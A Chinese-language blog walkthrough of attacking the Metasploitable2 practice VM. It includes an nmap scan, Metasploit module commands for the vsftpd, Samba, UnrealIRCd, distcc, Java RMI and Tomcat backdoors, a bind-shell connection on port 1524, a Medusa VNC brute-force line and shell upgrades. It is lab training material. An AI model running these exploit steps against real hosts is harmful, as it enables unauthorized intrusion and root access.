MSF对Metasploitable2-Linux的渗透测试

作者: hxf981224 分类: 未分类 发布时间: 2019-10-15 22:36

1524端口,nc后门,telnet后门

是最暴露的,应首先杀死1524端口

nc攻击方法:

 nc x.x.x.x 1524

telnet攻击方法:

 telnet x.x.x.x 1524

telnet攻击方法2:

1.信息收集 (先进行主机发现,然后端口识别,服务扫描)

 arp -a

nmap -sV -O -T4 192.168.41.206

 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 18:50 CST
 Nmap scan report for 192.168.41.206
 Host is up (0.00028s latency).
 Not shown: 978 closed ports
 PORT     STATE SERVICE     VERSION
 21/tcp   open ftp         vsftpd 2.3.4
 22/tcp   open ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
 23/tcp   open telnet     Linux telnetd
 25/tcp   open smtp       Postfix smtpd
 53/tcp   open domain     ISC BIND 9.4.2
 80/tcp   open http       Apache httpd 2.2.8 ((Ubuntu) DAV/2)
 111/tcp open rpcbind     2 (RPC #100000)
 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 512/tcp open exec       netkit-rsh rexecd
 513/tcp open login?
 514/tcp open shell?
 1099/tcp open rmiregistry GNU Classpath grmiregistry
 1524/tcp open bindshell   Metasploitable root shell
 2049/tcp open nfs         2-4 (RPC #100003)
 2121/tcp open ftp         ProFTPD 1.3.1
 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
 5900/tcp open vnc         VNC (protocol 3.3)
 6000/tcp open X11         (access denied)
 6667/tcp open irc         UnrealIRCd
 8009/tcp open ajp13       Apache Jserv (Protocol v1.3)
 8180/tcp open http       Apache Tomcat/Coyote JSP engine 1.1
 MAC Address: 00:0C:29:18:51:A2 (VMware)
 Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 ​
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 165.11 seconds
  1. 发现端口22,23 即ssh,telnet 服务尝试使用弱口令

ssh配置使用了次数限制,因此ssh爆破也不可能了

 ssh 192.168.41.206   

telnet尝试:

 telnet 192.168.41.206

然后…..一直exit退出到kali

21端口,ftp后门(只能攻击一次)

攻击方法: 在kali中调用msf (msfconsole) 调用攻击模块

 use exploit/unix/ftp/vsftpd_234_backdoor 
 show options
 set rhost 被攻击机ip
 run
pwd查看现在在那个目录
cd root 进入root目录
cat flag.txt  查看flag

139端口,445端口 samba后门

攻击方法: 在kali中调用msf (msfconsole) 调用攻击模块

use exploit/multi/samba/usermap_script 
show options
set rhost 被攻击机ip
run
pwd查看现在在那个目录
cd root 进入root目录
cat flag.txt  查看flag

8180端口,在tomcat后门

攻击方法: 在kali中调用msf (msfconsole) 调用攻击模块

use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 被攻击机ip
run

攻击方法2:

use exploit/multi/http/tomcat_mgr_deploy
set rhost 192.168.80.141
set rport 8180
set httpusername tomcat
set httppassword tomcat
run

6667端口,在irc后门

攻击方法: 在kali中调用msf (msfconsole) 调用攻击模块

use exploit/unix/irc/unreal_ircd_3281_backdoor 
set rhosts 被攻击机ip
run
pwd查看现在在那个目录
cd root 进入root目录
cat flag.txt  查看flag

Distcc攻击 3632端口

1.启动msf use exploit/unix/misc/distcc_exec模块

use exploit/unix/misc/distcc_exec
show options

设置 目标主机IP,以及监听主机

set rhosts 192.168.41.234
set lhost 192.168.41.44
run

接下来就要想办法提权了。 先利用 python -c ‘import pty;pty.spawn(“/bin/bash”)’ 生成一个shell

进入msf 搜索drb

1.进入msf 搜索drb

远程代码可执行漏洞

druby 默认端口是8787

提权命令进入

python -c ‘import pty;pty.spawn(“/bin/bash”)’

对6667,6697 unreal IRcd的利用

查看模块

search unreal
set rhost 192.168.41.234
set lhost 192.168.41.44
run
python -c ‘import pty;pty.spawn(“/bin/bash”)’

linux NFS共享目录配置漏洞

1.rpcinfo -p 192.168.2.128 查看nfs是否开放

msf对445端口的利用

use exploit/multi/samda/usermap_script
set rhost 192.168.41.234
set lhost 192.168.41.44
run

msf对1099端口的java RMI服务攻击利用(只能打一次)

use exploit/multi/misc/java_rmi_server
show options
set rhost 192.168.41.234
set lhost 192.168.41.44
run

set payload 然后exploit 需要将url通过靶机发送给kali

set paylosd
sessions
session -i 1

利用vnc 5900

use auxiliary/scanner/vnc/vnc_none_auth 
show options
nmap 192.168.41.234  找到5900 vnc端口

使用美杜莎:

medusa -h 192.168.41.234 -u root -P /root/password.txt -e ns -M vnc -T 20 -O /tmp/good.txt -r 0
vncviewer 192.168.41.234

由于vnc配置 限制了次数 因此爆破失败

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云